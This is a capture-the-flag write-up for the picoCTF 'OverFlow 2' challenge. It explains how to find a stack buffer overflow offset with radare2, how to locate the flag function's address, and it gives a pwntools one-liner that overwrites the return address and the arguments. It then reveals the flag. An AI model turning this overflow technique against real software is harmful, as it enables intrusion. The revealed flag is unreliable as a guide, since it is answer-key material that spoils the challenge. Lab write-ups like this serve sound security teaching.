OverFlow 2

Problem

Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_2_47d6bbdfb1ccd0d65a76e6cbe0935b0f on the shell server. Source.

Solution

  1. Find the offset/padding
     1. You can use the method described in rop64 with cyclic and cyclic_find, or you can use the following.
     2. Open vuln in radare2 with r2 ./vuln
     3. Run aaaa
     4. Run pdf @ sym.vuln to get var int local_b8h @ ebp-0xb8
     5. The 0xb8 is the distance from the start of the buffer to the saved ebp, so 4 more bytes are needed to get past the saved ebp register and reach the saved return address.
     6. So the offset is 0xb8+4
  2. Run readelf -s vuln to get the address of flag: 0x080485e6
  3. We can use p32 from pwntools to convert the hex addresses to little endian.
  4. The 4 bytes after the address of flag are the return address flag will pop when it finishes. We do not need it to return anywhere sensible (the flag is already printed by then), so we pad it with 'a'*4, and that goes next in the payload.
  5. Now we can add the two function arguments in little endian using p32. Under the 32-bit cdecl convention flag reads its arguments from the stack directly above its return address, which is exactly where these land.
  6. Payload complete: python2 -c "from pwn import *; print 'a'*(0xb8+4)+p32(0x080485e6)+'a'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln

Flag

picoCTF{arg5_and_r3turn5ce5cf61a}